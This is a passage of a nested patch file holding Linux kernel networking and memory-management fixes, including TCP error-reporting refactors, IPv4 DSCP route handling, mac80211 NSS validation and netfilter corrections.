++		return;
++	if (memcg->css.cgroup)
++		cgroup_path(memcg->css.cgroup, buf, buflen);
+ 	css_put(&memcg->css);
+-out:
+-	return buf;
+ }
+ 
+ #endif /* CONFIG_MEMCG */
+diff --git a/mm/vmscan.c b/mm/vmscan.c
+index a3b1d8e5dbb3d..4cd0cbf9c1212 100644
+--- a/mm/vmscan.c
++++ b/mm/vmscan.c
+@@ -5065,7 +5065,6 @@ static int evict_folios(struct lruvec *lruvec, struct scan_control *sc, int swap
+ 
+ 		/* retry folios that may have missed folio_rotate_reclaimable() */
+ 		list_move(&folio->lru, &clean);
+-		sc->nr_scanned -= folio_nr_pages(folio);
+ 	}
+ 
+ 	spin_lock_irq(&lruvec->lru_lock);
+diff --git a/net/bridge/br_forward.c b/net/bridge/br_forward.c
+index 9661698e86e40..a32d73f381558 100644
+--- a/net/bridge/br_forward.c
++++ b/net/bridge/br_forward.c
+@@ -25,8 +25,8 @@ static inline int should_deliver(const struct net_bridge_port *p,
+ 
+ 	vg = nbp_vlan_group_rcu(p);
+ 	return ((p->flags & BR_HAIRPIN_MODE) || skb->dev != p->dev) &&
+-		p->state == BR_STATE_FORWARDING && br_allowed_egress(vg, skb) &&
+-		nbp_switchdev_allowed_egress(p, skb) &&
++		(br_mst_is_enabled(p->br) || p->state == BR_STATE_FORWARDING) &&
++		br_allowed_egress(vg, skb) && nbp_switchdev_allowed_egress(p, skb) &&
+ 		!br_skb_isolated(p, skb);
+ }
+ 
+diff --git a/net/core/filter.c b/net/core/filter.c
+index dc89c34247187..210b881cb50b8 100644
+--- a/net/core/filter.c
++++ b/net/core/filter.c
+@@ -3518,13 +3518,20 @@ static int bpf_skb_net_grow(struct sk_buff *skb, u32 off, u32 len_diff,
+ 	if (skb_is_gso(skb)) {
+ 		struct skb_shared_info *shinfo = skb_shinfo(skb);
+ 
+-		/* Due to header grow, MSS needs to be downgraded. */
+-		if (!(flags & BPF_F_ADJ_ROOM_FIXED_GSO))
+-			skb_decrease_gso_size(shinfo, len_diff);
+-
+ 		/* Header must be checked, and gso_segs recomputed. */
+ 		shinfo->gso_type |= gso_type;
+ 		shinfo->gso_segs = 0;
++
++		/* Due to header growth, MSS needs to be downgraded.
++		 * There is a BUG_ON() when segmenting the frag_list with
++		 * head_frag true, so linearize the skb after downgrading
++		 * the MSS.
++		 */
++		if (!(flags & BPF_F_ADJ_ROOM_FIXED_GSO)) {
++			skb_decrease_gso_size(shinfo, len_diff);
++			if (shinfo->frag_list)
++				return skb_linearize(skb);
++		}
+ 	}
+ 
+ 	return 0;
+diff --git a/net/core/flow_dissector.c b/net/core/flow_dissector.c
+index 0c85c8a9e752f..fba8eb1bb2815 100644
+--- a/net/core/flow_dissector.c
++++ b/net/core/flow_dissector.c
+@@ -1013,7 +1013,7 @@ bool __skb_flow_dissect(const struct net *net,
+ 		}
+ 	}
+ 
+-	WARN_ON_ONCE(!net);
++	DEBUG_NET_WARN_ON_ONCE(!net);
+ 	if (net) {
+ 		enum netns_bpf_attach_type type = NETNS_BPF_FLOW_DISSECTOR;
+ 		struct bpf_prog_array *run_array;
+diff --git a/net/core/xdp.c b/net/core/xdp.c
+index c3f6653b42742..90de33b7c9ce3 100644
+--- a/net/core/xdp.c
++++ b/net/core/xdp.c
+@@ -124,10 +124,8 @@ void xdp_unreg_mem_model(struct xdp_mem_info *mem)
+ 		return;
+ 
+ 	if (type == MEM_TYPE_PAGE_POOL) {
+-		rcu_read_lock();
+-		xa = rhashtable_lookup(mem_id_ht, &id, mem_id_rht_params);
++		xa = rhashtable_lookup_fast(mem_id_ht, &id, mem_id_rht_params);
+ 		page_pool_destroy(xa->page_pool);
+-		rcu_read_unlock();
+ 	}
+ }
+ EXPORT_SYMBOL_GPL(xdp_unreg_mem_model);
+diff --git a/net/ipv4/esp4.c b/net/ipv4/esp4.c
+index e2546961add3e..419969b268225 100644
+--- a/net/ipv4/esp4.c
++++ b/net/ipv4/esp4.c
+@@ -238,8 +238,7 @@ static int esp_output_tail_tcp(struct xfrm_state *x, struct sk_buff *skb)
+ #else
+ static int esp_output_tail_tcp(struct xfrm_state *x, struct sk_buff *skb)
+ {
+-	kfree_skb(skb);
+-
++	WARN_ON(1);
+ 	return -EOPNOTSUPP;
+ }
+ #endif
+diff --git a/net/ipv4/fib_semantics.c b/net/ipv4/fib_semantics.c
+index 5eb1b8d302bbd..e3268615a65a1 100644
+--- a/net/ipv4/fib_semantics.c
++++ b/net/ipv4/fib_semantics.c
+@@ -2270,6 +2270,15 @@ void fib_select_path(struct net *net, struct fib_result *res,
+ 		fib_select_default(fl4, res);
+ 
+ check_saddr:
+-	if (!fl4->saddr)
+-		fl4->saddr = fib_result_prefsrc(net, res);
++	if (!fl4->saddr) {
++		struct net_device *l3mdev;
++
++		l3mdev = dev_get_by_index_rcu(net, fl4->flowi4_l3mdev);
++
++		if (!l3mdev ||
++		    l3mdev_master_dev_rcu(FIB_RES_DEV(*res)) == l3mdev)
++			fl4->saddr = fib_result_prefsrc(net, res);
++		else
++			fl4->saddr = inet_select_addr(l3mdev, 0, RT_SCOPE_LINK);
++	}
+ }
+diff --git a/net/ipv4/fib_trie.c b/net/ipv4/fib_trie.c
+index 9bdfdab906fe0..77b97c48da5ea 100644
+--- a/net/ipv4/fib_trie.c
++++ b/net/ipv4/fib_trie.c
+@@ -1628,6 +1628,7 @@ int fib_table_lookup(struct fib_table *tb, const struct flowi4 *flp,
+ 			res->nhc = nhc;
+ 			res->type = fa->fa_type;
+ 			res->scope = fi->fib_scope;
++			res->dscp = fa->fa_dscp;
+ 			res->fi = fi;
+ 			res->table = tb;
+ 			res->fa_head = &n->leaf;
+diff --git a/net/ipv4/nexthop.c b/net/ipv4/nexthop.c
+index be5498f5dd319..bba955d82f723 100644
+--- a/net/ipv4/nexthop.c
++++ b/net/ipv4/nexthop.c
+@@ -676,9 +676,10 @@ static int nla_put_nh_group(struct sk_buff *skb, struct nh_group *nhg)
+ 
+ 	p = nla_data(nla);
+ 	for (i = 0; i < nhg->num_nh; ++i) {
+-		p->id = nhg->nh_entries[i].nh->id;
+-		p->weight = nhg->nh_entries[i].weight - 1;
+-		p += 1;
++		*p++ = (struct nexthop_grp) {
++			.id = nhg->nh_entries[i].nh->id,
++			.weight = nhg->nh_entries[i].weight - 1,
++		};
+ 	}
+ 
+ 	if (nhg->resilient && nla_put_nh_group_res(skb, nhg))
+diff --git a/net/ipv4/route.c b/net/ipv4/route.c
+index fcbacd39febe0..fda88894d0205 100644
+--- a/net/ipv4/route.c
++++ b/net/ipv4/route.c
+@@ -1275,7 +1275,7 @@ void ip_rt_get_source(u8 *addr, struct sk_buff *skb, struct rtable *rt)
+ 		struct flowi4 fl4 = {
+ 			.daddr = iph->daddr,
+ 			.saddr = iph->saddr,
+-			.flowi4_tos = RT_TOS(iph->tos),
++			.flowi4_tos = iph->tos & IPTOS_RT_MASK,
+ 			.flowi4_oif = rt->dst.dev->ifindex,
+ 			.flowi4_iif = skb->dev->ifindex,
+ 			.flowi4_mark = skb->mark,
+@@ -2934,9 +2934,9 @@ EXPORT_SYMBOL_GPL(ip_route_output_tunnel);
+ 
+ /* called with rcu_read_lock held */
+ static int rt_fill_info(struct net *net, __be32 dst, __be32 src,
+-			struct rtable *rt, u32 table_id, struct flowi4 *fl4,
+-			struct sk_buff *skb, u32 portid, u32 seq,
+-			unsigned int flags)
++			struct rtable *rt, u32 table_id, dscp_t dscp,
++			struct flowi4 *fl4, struct sk_buff *skb, u32 portid,
++			u32 seq, unsigned int flags)
+ {
+ 	struct rtmsg *r;
+ 	struct nlmsghdr *nlh;
+@@ -2952,7 +2952,7 @@ static int rt_fill_info(struct net *net, __be32 dst, __be32 src,
+ 	r->rtm_family	 = AF_INET;
+ 	r->rtm_dst_len	= 32;
+ 	r->rtm_src_len	= 0;
+-	r->rtm_tos	= fl4 ? fl4->flowi4_tos : 0;
++	r->rtm_tos	= inet_dscp_to_dsfield(dscp);
+ 	r->rtm_table	= table_id < 256 ? table_id : RT_TABLE_COMPAT;
+ 	if (nla_put_u32(skb, RTA_TABLE, table_id))
+ 		goto nla_put_failure;
+@@ -3102,7 +3102,7 @@ static int fnhe_dump_bucket(struct net *net, struct sk_buff *skb,
+ 				goto next;
+ 
+ 			err = rt_fill_info(net, fnhe->fnhe_daddr, 0, rt,
+-					   table_id, NULL, skb,
++					   table_id, 0, NULL, skb,
+ 					   NETLINK_CB(cb->skb).portid,
+ 					   cb->nlh->nlmsg_seq, flags);
+ 			if (err)
+@@ -3398,7 +3398,7 @@ static int inet_rtm_getroute(struct sk_buff *in_skb, struct nlmsghdr *nlh,
+ 		fri.tb_id = table_id;
+ 		fri.dst = res.prefix;
+ 		fri.dst_len = res.prefixlen;
+-		fri.dscp = inet_dsfield_to_dscp(fl4.flowi4_tos);
++		fri.dscp = res.dscp;
+ 		fri.type = rt->rt_type;
+ 		fri.offload = 0;
+ 		fri.trap = 0;
+@@ -3425,8 +3425,8 @@ static int inet_rtm_getroute(struct sk_buff *in_skb, struct nlmsghdr *nlh,
+ 		err = fib_dump_info(skb, NETLINK_CB(in_skb).portid,
+ 				    nlh->nlmsg_seq, RTM_NEWROUTE, &fri, 0);
+ 	} else {
+-		err = rt_fill_info(net, dst, src, rt, table_id, &fl4, skb,
+-				   NETLINK_CB(in_skb).portid,
++		err = rt_fill_info(net, dst, src, rt, table_id, res.dscp, &fl4,
++				   skb, NETLINK_CB(in_skb).portid,
+ 				   nlh->nlmsg_seq, 0);
+ 	}
+ 	if (err < 0)
+diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c
+index 2d4f697d338f5..cb79919323a62 100644
+--- a/net/ipv4/tcp.c
++++ b/net/ipv4/tcp.c
+@@ -589,9 +589,10 @@ __poll_t tcp_poll(struct file *file, struct socket *sock, poll_table *wait)
+ 		 */
+ 		mask |= EPOLLOUT | EPOLLWRNORM;
+ 	}
+-	/* This barrier is coupled with smp_wmb() in tcp_reset() */
++	/* This barrier is coupled with smp_wmb() in tcp_done_with_error() */
+ 	smp_rmb();
+-	if (sk->sk_err || !skb_queue_empty_lockless(&sk->sk_error_queue))
++	if (READ_ONCE(sk->sk_err) ||
++	    !skb_queue_empty_lockless(&sk->sk_error_queue))
+ 		mask |= EPOLLERR;
+ 
+ 	return mask;
+@@ -3119,7 +3120,7 @@ int tcp_disconnect(struct sock *sk, int flags)
+ 	if (old_state == TCP_LISTEN) {
+ 		inet_csk_listen_stop(sk);
+ 	} else if (unlikely(tp->repair)) {
+-		sk->sk_err = ECONNABORTED;
++		WRITE_ONCE(sk->sk_err, ECONNABORTED);
+ 	} else if (tcp_need_reset(old_state) ||
+ 		   (tp->snd_nxt != tp->write_seq &&
+ 		    (1 << old_state) & (TCPF_CLOSING | TCPF_LAST_ACK))) {
+@@ -3127,9 +3128,9 @@ int tcp_disconnect(struct sock *sk, int flags)
+ 		 * states
+ 		 */
+ 		tcp_send_active_reset(sk, gfp_any());
+-		sk->sk_err = ECONNRESET;
++		WRITE_ONCE(sk->sk_err, ECONNRESET);
+ 	} else if (old_state == TCP_SYN_SENT)
+-		sk->sk_err = ECONNRESET;
++		WRITE_ONCE(sk->sk_err, ECONNRESET);
+ 
+ 	tcp_clear_xmit_timers(sk);
+ 	__skb_queue_purge(&sk->sk_receive_queue);
+@@ -4735,7 +4736,7 @@ int tcp_abort(struct sock *sk, int err)
+ 	bh_lock_sock(sk);
+ 
+ 	if (!sock_flag(sk, SOCK_DEAD)) {
+-		sk->sk_err = err;
++		WRITE_ONCE(sk->sk_err, err);
+ 		/* This barrier is coupled with smp_rmb() in tcp_poll() */
+ 		smp_wmb();
+ 		sk_error_report(sk);
+diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
+index 359ffda9b736b..b1b4f44d21370 100644
+--- a/net/ipv4/tcp_input.c
++++ b/net/ipv4/tcp_input.c
+@@ -3922,7 +3922,7 @@ static int tcp_ack(struct sock *sk, const struct sk_buff *skb, int flag)
+ 	/* We passed data and got it acked, remove any soft error
+ 	 * log. Something worked...
+ 	 */
+-	sk->sk_err_soft = 0;
++	WRITE_ONCE(sk->sk_err_soft, 0);
+ 	icsk->icsk_probes_out = 0;
+ 	tp->rcv_tstamp = tcp_jiffies32;
+ 	if (!prior_packets)
+@@ -4356,9 +4356,26 @@ static inline bool tcp_sequence(const struct tcp_sock *tp, u32 seq, u32 end_seq)
+ 		!after(seq, tp->rcv_nxt + tcp_receive_window(tp));
+ }
+ 
++
++void tcp_done_with_error(struct sock *sk, int err)
++{
++	/* This barrier is coupled with smp_rmb() in tcp_poll() */
++	WRITE_ONCE(sk->sk_err, err);
++	smp_wmb();
++
++	tcp_write_queue_purge(sk);
++	tcp_done(sk);
++
++	if (!sock_flag(sk, SOCK_DEAD))
++		sk_error_report(sk);
++}
++EXPORT_SYMBOL(tcp_done_with_error);
++
+ /* When we get a reset we do this. */
+ void tcp_reset(struct sock *sk, struct sk_buff *skb)
+ {
++	int err;
++
+ 	trace_tcp_receive_reset(sk);
+ 
+ 	/* mptcp can't tell us to ignore reset pkts,
+@@ -4370,24 +4387,17 @@ void tcp_reset(struct sock *sk, struct sk_buff *skb)
+ 	/* We want the right error as BSD sees it (and indeed as we do). */
+ 	switch (sk->sk_state) {
+ 	case TCP_SYN_SENT:
+-		sk->sk_err = ECONNREFUSED;
++		err = ECONNREFUSED;
+ 		break;
+ 	case TCP_CLOSE_WAIT:
+-		sk->sk_err = EPIPE;
++		err = EPIPE;
+ 		break;
+ 	case TCP_CLOSE:
+ 		return;
+ 	default:
+-		sk->sk_err = ECONNRESET;
++		err = ECONNRESET;
+ 	}
+-	/* This barrier is coupled with smp_rmb() in tcp_poll() */
+-	smp_wmb();
+-
+-	tcp_write_queue_purge(sk);
+-	tcp_done(sk);
+-
+-	if (!sock_flag(sk, SOCK_DEAD))
+-		sk_error_report(sk);
++	tcp_done_with_error(sk, err);
+ }
+ 
+ /*
+diff --git a/net/ipv4/tcp_ipv4.c b/net/ipv4/tcp_ipv4.c
+index befa848fb820c..c64ba4f8ddaa9 100644
+--- a/net/ipv4/tcp_ipv4.c
++++ b/net/ipv4/tcp_ipv4.c
+@@ -368,7 +368,7 @@ void tcp_v4_mtu_reduced(struct sock *sk)
+ 	 * for the case, if this connection will not able to recover.
+ 	 */
+ 	if (mtu < dst_mtu(dst) && ip_dont_fragment(sk, dst))
+-		sk->sk_err_soft = EMSGSIZE;
++		WRITE_ONCE(sk->sk_err_soft, EMSGSIZE);
+ 
+ 	mtu = dst_mtu(dst);
+ 
+@@ -602,15 +602,10 @@ int tcp_v4_err(struct sk_buff *skb, u32 info)
+ 
+ 		ip_icmp_error(sk, skb, err, th->dest, info, (u8 *)th);
+ 
+-		if (!sock_owned_by_user(sk)) {
+-			sk->sk_err = err;
+-
+-			sk_error_report(sk);
+-
+-			tcp_done(sk);
+-		} else {
+-			sk->sk_err_soft = err;
+-		}
++		if (!sock_owned_by_user(sk))
++			tcp_done_with_error(sk, err);
++		else
++			WRITE_ONCE(sk->sk_err_soft, err);
+ 		goto out;
+ 	}
+ 
+@@ -632,10 +627,10 @@ int tcp_v4_err(struct sk_buff *skb, u32 info)
+ 
+ 	inet = inet_sk(sk);
+ 	if (!sock_owned_by_user(sk) && inet->recverr) {
+-		sk->sk_err = err;
++		WRITE_ONCE(sk->sk_err, err);
+ 		sk_error_report(sk);
+ 	} else	{ /* Only an error on timeout */
+-		sk->sk_err_soft = err;
++		WRITE_ONCE(sk->sk_err_soft, err);
+ 	}
+ 
+ out:
+diff --git a/net/ipv4/tcp_output.c b/net/ipv4/tcp_output.c
+index 15f814c1e1693..19b5a6179c061 100644
+--- a/net/ipv4/tcp_output.c
++++ b/net/ipv4/tcp_output.c
+@@ -3764,7 +3764,7 @@ static void tcp_connect_init(struct sock *sk)
+ 	tp->rx_opt.rcv_wscale = rcv_wscale;
+ 	tp->rcv_ssthresh = tp->rcv_wnd;
+ 
+-	sk->sk_err = 0;
++	WRITE_ONCE(sk->sk_err, 0);
+ 	sock_reset_flag(sk, SOCK_DONE);
+ 	tp->snd_wnd = 0;
+ 	tcp_init_wl(tp, 0);
+diff --git a/net/ipv4/tcp_timer.c b/net/ipv4/tcp_timer.c
+index 016f9eff49b40..3662b49ce71ae 100644
+--- a/net/ipv4/tcp_timer.c
++++ b/net/ipv4/tcp_timer.c
+@@ -67,11 +67,7 @@ u32 tcp_clamp_probe0_to_user_timeout(const struct sock *sk, u32 when)
+ 
+ static void tcp_write_err(struct sock *sk)
+ {
+-	sk->sk_err = sk->sk_err_soft ? : ETIMEDOUT;
+-	sk_error_report(sk);
+-
+-	tcp_write_queue_purge(sk);
+-	tcp_done(sk);
++	tcp_done_with_error(sk, READ_ONCE(sk->sk_err_soft) ? : ETIMEDOUT);
+ 	__NET_INC_STATS(sock_net(sk), LINUX_MIB_TCPABORTONTIMEOUT);
+ }
+ 
+@@ -110,7 +106,7 @@ static int tcp_out_of_resources(struct sock *sk, bool do_reset)
+ 		shift++;
+ 
+ 	/* If some dubious ICMP arrived, penalize even more. */
+-	if (sk->sk_err_soft)
++	if (READ_ONCE(sk->sk_err_soft))
+ 		shift++;
+ 
+ 	if (tcp_check_oom(sk, shift)) {
+@@ -146,7 +142,7 @@ static int tcp_orphan_retries(struct sock *sk, bool alive)
+ 	int retries = READ_ONCE(sock_net(sk)->ipv4.sysctl_tcp_orphan_retries); /* May be zero. */
+ 
+ 	/* We know from an ICMP that something is wrong. */
+-	if (sk->sk_err_soft && !alive)
++	if (READ_ONCE(sk->sk_err_soft) && !alive)
+ 		retries = 0;
+ 
+ 	/* However, if socket sent something recently, select some safe
+diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c
+index 22e246ff910ee..4e1e6ef72464c 100644
+--- a/net/ipv6/addrconf.c
++++ b/net/ipv6/addrconf.c
+@@ -1831,7 +1831,8 @@ int ipv6_dev_get_saddr(struct net *net, const struct net_device *dst_dev,
+ 							    master, &dst,
+ 							    scores, hiscore_idx);
+ 
+-			if (scores[hiscore_idx].ifa)
++			if (scores[hiscore_idx].ifa &&
++			    scores[hiscore_idx].scopedist >= 0)
+ 				goto out;
+ 		}
+ 
+diff --git a/net/ipv6/esp6.c b/net/ipv6/esp6.c
+index c2dcb5c613b6b..a021c88d3d9b8 100644
+--- a/net/ipv6/esp6.c
++++ b/net/ipv6/esp6.c
+@@ -255,8 +255,7 @@ static int esp_output_tail_tcp(struct xfrm_state *x, struct sk_buff *skb)
+ #else
+ static int esp_output_tail_tcp(struct xfrm_state *x, struct sk_buff *skb)
+ {
+-	kfree_skb(skb);
+-
++	WARN_ON(1);
+ 	return -EOPNOTSUPP;
+ }
+ #endif
+diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c
+index 4b0e05349862d..eb6fc0e2a4533 100644
+--- a/net/ipv6/tcp_ipv6.c
++++ b/net/ipv6/tcp_ipv6.c
+@@ -492,13 +492,10 @@ static int tcp_v6_err(struct sk_buff *skb, struct inet6_skb_parm *opt,
+ 
+ 		ipv6_icmp_error(sk, skb, err, th->dest, ntohl(info), (u8 *)th);
+ 
+-		if (!sock_owned_by_user(sk)) {
+-			sk->sk_err = err;
+-			sk_error_report(sk);		/* Wake people up to see the error (see connect in sock.c) */
+-
+-			tcp_done(sk);
+-		} else
+-			sk->sk_err_soft = err;
++		if (!sock_owned_by_user(sk))
++			tcp_done_with_error(sk, err);
++		else
++			WRITE_ONCE(sk->sk_err_soft, err);
+ 		goto out;
+ 	case TCP_LISTEN:
+ 		break;
+@@ -512,11 +509,11 @@ static int tcp_v6_err(struct sk_buff *skb, struct inet6_skb_parm *opt,
+ 	}
+ 
+ 	if (!sock_owned_by_user(sk) && np->recverr) {
+-		sk->sk_err = err;
++		WRITE_ONCE(sk->sk_err, err);
+ 		sk_error_report(sk);
+-	} else
+-		sk->sk_err_soft = err;
+-
++	} else {
++		WRITE_ONCE(sk->sk_err_soft, err);
++	}
+ out:
+ 	bh_unlock_sock(sk);
+ 	sock_put(sk);
+diff --git a/net/mac80211/cfg.c b/net/mac80211/cfg.c
+index 2c60fc165801c..1ce8fefd7f0d7 100644
+--- a/net/mac80211/cfg.c
++++ b/net/mac80211/cfg.c
+@@ -1775,7 +1775,7 @@ static int sta_link_apply_parameters(struct ieee80211_local *local,
+ 					      sband->band);
+ 	}
+ 
+-	ieee80211_sta_set_rx_nss(link_sta);
++	ieee80211_sta_init_nss(link_sta);
+ 
+ 	return ret;
+ }
+@@ -2577,6 +2577,17 @@ static int ieee80211_change_bss(struct wiphy *wiphy,
+ 	if (!sband)
+ 		return -EINVAL;
+ 
++	if (params->basic_rates) {
++		if (!ieee80211_parse_bitrates(sdata->vif.bss_conf.chandef.width,
++					      wiphy->bands[sband->band],
++					      params->basic_rates,
++					      params->basic_rates_len,
++					      &sdata->vif.bss_conf.basic_rates))
++			return -EINVAL;
++		changed |= BSS_CHANGED_BASIC_RATES;
++		ieee80211_check_rate_mask(&sdata->deflink);
++	}
++
+ 	if (params->use_cts_prot >= 0) {
+ 		sdata->vif.bss_conf.use_cts_prot = params->use_cts_prot;
+ 		changed |= BSS_CHANGED_ERP_CTS_PROT;
+@@ -2600,16 +2611,6 @@ static int ieee80211_change_bss(struct wiphy *wiphy,
+ 		changed |= BSS_CHANGED_ERP_SLOT;
+ 	}
+ 
+-	if (params->basic_rates) {
+-		ieee80211_parse_bitrates(sdata->vif.bss_conf.chandef.width,
+-					 wiphy->bands[sband->band],
+-					 params->basic_rates,
+-					 params->basic_rates_len,
+-					 &sdata->vif.bss_conf.basic_rates);
+-		changed |= BSS_CHANGED_BASIC_RATES;
+-		ieee80211_check_rate_mask(&sdata->deflink);
+-	}
+-
+ 	if (params->ap_isolate >= 0) {
+ 		if (params->ap_isolate)
+ 			sdata->flags |= IEEE80211_SDATA_DONT_BRIDGE_PACKETS;
+diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h
+index 0d8a9bb925384..709eb7bfcf194 100644
+--- a/net/mac80211/ieee80211_i.h
++++ b/net/mac80211/ieee80211_i.h
+@@ -2071,7 +2071,7 @@ enum ieee80211_sta_rx_bandwidth
+ ieee80211_sta_cap_rx_bw(struct link_sta_info *link_sta);
+ enum ieee80211_sta_rx_bandwidth
+ ieee80211_sta_cur_vht_bw(struct link_sta_info *link_sta);
+-void ieee80211_sta_set_rx_nss(struct link_sta_info *link_sta);
++void ieee80211_sta_init_nss(struct link_sta_info *link_sta);
+ enum ieee80211_sta_rx_bandwidth
+ ieee80211_chan_width_to_rx_bw(enum nl80211_chan_width width);
+ enum nl80211_chan_width
+diff --git a/net/mac80211/rate.c b/net/mac80211/rate.c
+index a2bc9c5d92b8b..3cf252418bd38 100644
+--- a/net/mac80211/rate.c
++++ b/net/mac80211/rate.c
+@@ -37,7 +37,7 @@ void rate_control_rate_init(struct sta_info *sta)
+ 	struct ieee80211_supported_band *sband;
+ 	struct ieee80211_chanctx_conf *chanctx_conf;
+ 
+-	ieee80211_sta_set_rx_nss(&sta->deflink);
++	ieee80211_sta_init_nss(&sta->deflink);
+ 
+ 	if (!ref)
+ 		return;
+diff --git a/net/mac80211/sta_info.h b/net/mac80211/sta_info.h
+index 2517ea714dc42..4809756a43dd1 100644
+--- a/net/mac80211/sta_info.h
++++ b/net/mac80211/sta_info.h
+@@ -3,7 +3,7 @@
+  * Copyright 2002-2005, Devicescape Software, Inc.
+  * Copyright 2013-2014  Intel Mobile Communications GmbH
+  * Copyright(c) 2015-2017 Intel Deutschland GmbH
+- * Copyright(c) 2020-2022 Intel Corporation
++ * Copyright(c) 2020-2024 Intel Corporation
+  */
+ 
+ #ifndef STA_INFO_H
+@@ -485,6 +485,8 @@ struct ieee80211_fragment_cache {
+  *	same for non-MLD STA. This is used as key for searching link STA
+  * @link_id: Link ID uniquely identifying the link STA. This is 0 for non-MLD
+  *	and set to the corresponding vif LinkId for MLD STA
++ * @op_mode_nss: NSS limit as set by operating mode notification, or 0
++ * @capa_nss: NSS limit as determined by local and peer capabilities
+  * @link_hash_node: hash node for rhashtable
+  * @sta: Points to the STA info
+  * @gtk: group keys negotiated with this station, if any
+@@ -520,6 +522,8 @@ struct link_sta_info {
+ 	u8 addr[ETH_ALEN];
+ 	u8 link_id;
+ 
++	u8 op_mode_nss, capa_nss;
++
+ 	struct rhlist_head link_hash_node;
+ 
+ 	struct sta_info *sta;
+diff --git a/net/mac80211/vht.c b/net/mac80211/vht.c
+index f7526be8a1c7e..bc13b1419981a 100644
+--- a/net/mac80211/vht.c
++++ b/net/mac80211/vht.c
+@@ -4,7 +4,7 @@
+  *
+  * Portions of this file
+  * Copyright(c) 2015 - 2016 Intel Deutschland GmbH
+- * Copyright (C) 2018 - 2023 Intel Corporation
++ * Copyright (C) 2018 - 2024 Intel Corporation
+  */
+ 
+ #include <linux/ieee80211.h>
+@@ -541,15 +541,11 @@ ieee80211_sta_cur_vht_bw(struct link_sta_info *link_sta)
+ 	return bw;
+ }
+ 
+-void ieee80211_sta_set_rx_nss(struct link_sta_info *link_sta)
++void ieee80211_sta_init_nss(struct link_sta_info *link_sta)
+ {
+ 	u8 ht_rx_nss = 0, vht_rx_nss = 0, he_rx_nss = 0, eht_rx_nss = 0, rx_nss;
+ 	bool support_160;
+ 
+-	/* if we received a notification already don't overwrite it */
+-	if (link_sta->pub->rx_nss)
+-		return;
+-
+ 	if (link_sta->pub->eht_cap.has_eht) {
+ 		int i;
+ 		const u8 *rx_nss_mcs = (void *)&link_sta->pub->eht_cap.eht_mcs_nss_supp;
+@@ -627,7 +623,15 @@ void ieee80211_sta_set_rx_nss(struct link_sta_info *link_sta)
+ 	rx_nss = max(vht_rx_nss, ht_rx_nss);
+ 	rx_nss = max(he_rx_nss, rx_nss);
+ 	rx_nss = max(eht_rx_nss, rx_nss);
+-	link_sta->pub->rx_nss = max_t(u8, 1, rx_nss);
++	rx_nss = max_t(u8, 1, rx_nss);
++	link_sta->capa_nss = rx_nss;
++
++	/* that shouldn't be set yet, but we can handle it anyway */
++	if (link_sta->op_mode_nss)
++		link_sta->pub->rx_nss =
++			min_t(u8, rx_nss, link_sta->op_mode_nss);
++	else
++		link_sta->pub->rx_nss = rx_nss;
+ }
+ 
+ u32 __ieee80211_vht_handle_opmode(struct ieee80211_sub_if_data *sdata,
+@@ -647,11 +651,20 @@ u32 __ieee80211_vht_handle_opmode(struct ieee80211_sub_if_data *sdata,
+ 	nss >>= IEEE80211_OPMODE_NOTIF_RX_NSS_SHIFT;
+ 	nss += 1;
+ 
+-	if (link_sta->pub->rx_nss != nss) {
+-		link_sta->pub->rx_nss = nss;
+-		sta_opmode.rx_nss = nss;
+-		changed |= IEEE80211_RC_NSS_CHANGED;
+-		sta_opmode.changed |= STA_OPMODE_N_SS_CHANGED;
++	if (link_sta->op_mode_nss != nss) {
++		if (nss <= link_sta->capa_nss) {
++			link_sta->op_mode_nss = nss;
++
++			if (nss != link_sta->pub->rx_nss) {
++				link_sta->pub->rx_nss = nss;
++				changed |= IEEE80211_RC_NSS_CHANGED;
++				sta_opmode.rx_nss = link_sta->pub->rx_nss;
++				sta_opmode.changed |= STA_OPMODE_N_SS_CHANGED;
++			}
++		} else {
++			pr_warn_ratelimited("Ignoring NSS change in VHT Operating Mode Notification from %pM with invalid nss %d",
++					    link_sta->pub->addr, nss);
++		}
+ 	}
+ 
+ 	switch (opmode & IEEE80211_OPMODE_NOTIF_CHANWIDTH_MASK) {
+diff --git a/net/netfilter/ipvs/ip_vs_proto_sctp.c b/net/netfilter/ipvs/ip_vs_proto_sctp.c
+index 1e689c7141271..83e452916403d 100644
+--- a/net/netfilter/ipvs/ip_vs_proto_sctp.c
++++ b/net/netfilter/ipvs/ip_vs_proto_sctp.c
+@@ -126,7 +126,7 @@ sctp_snat_handler(struct sk_buff *skb, struct ip_vs_protocol *pp,
+ 	if (sctph->source != cp->vport || payload_csum ||
+ 	    skb->ip_summed == CHECKSUM_PARTIAL) {
+ 		sctph->source = cp->vport;
+-		if (!skb_is_gso(skb) || !skb_is_gso_sctp(skb))
++		if (!skb_is_gso(skb))
+ 			sctp_nat_csum(skb, sctph, sctphoff);
+ 	} else {
+ 		skb->ip_summed = CHECKSUM_UNNECESSARY;
+@@ -175,7 +175,7 @@ sctp_dnat_handler(struct sk_buff *skb, struct ip_vs_protocol *pp,
+ 	    (skb->ip_summed == CHECKSUM_PARTIAL &&
+ 	     !(skb_dst(skb)->dev->features & NETIF_F_SCTP_CRC))) {
+ 		sctph->dest = cp->dport;
+-		if (!skb_is_gso(skb) || !skb_is_gso_sctp(skb))
++		if (!skb_is_gso(skb))
+ 			sctp_nat_csum(skb, sctph, sctphoff);
+ 	} else if (skb->ip_summed != CHECKSUM_PARTIAL) {
+ 		skb->ip_summed = CHECKSUM_UNNECESSARY;
+diff --git a/net/netfilter/nf_conntrack_netlink.c b/net/netfilter/nf_conntrack_netlink.c
+index 9ee8abd3e4b10..9672b0e00d6bf 100644
+--- a/net/netfilter/nf_conntrack_netlink.c
++++ b/net/netfilter/nf_conntrack_netlink.c
+@@ -3415,7 +3415,8 @@ static int ctnetlink_del_expect(struct sk_buff *skb,
+ 
+ 		if (cda[CTA_EXPECT_ID]) {
+ 			__be32 id = nla_get_be32(cda[CTA_EXPECT_ID]);
+-			if (ntohl(id) != (u32)(unsigned long)exp) {
++
++			if (id != nf_expect_get_id(exp)) {
+ 				nf_ct_expect_put(exp);
+ 				return -ENOENT;
+ 			}
+diff --git a/net/netfilter/nft_set_pipapo.c b/net/netfilter/nft_set_pipapo.c
+index a56ed216c2233..d9c1c467ea684 100644
+--- a/net/netfilter/nft_set_pipapo.c
++++ b/net/netfilter/nft_set_pipapo.c
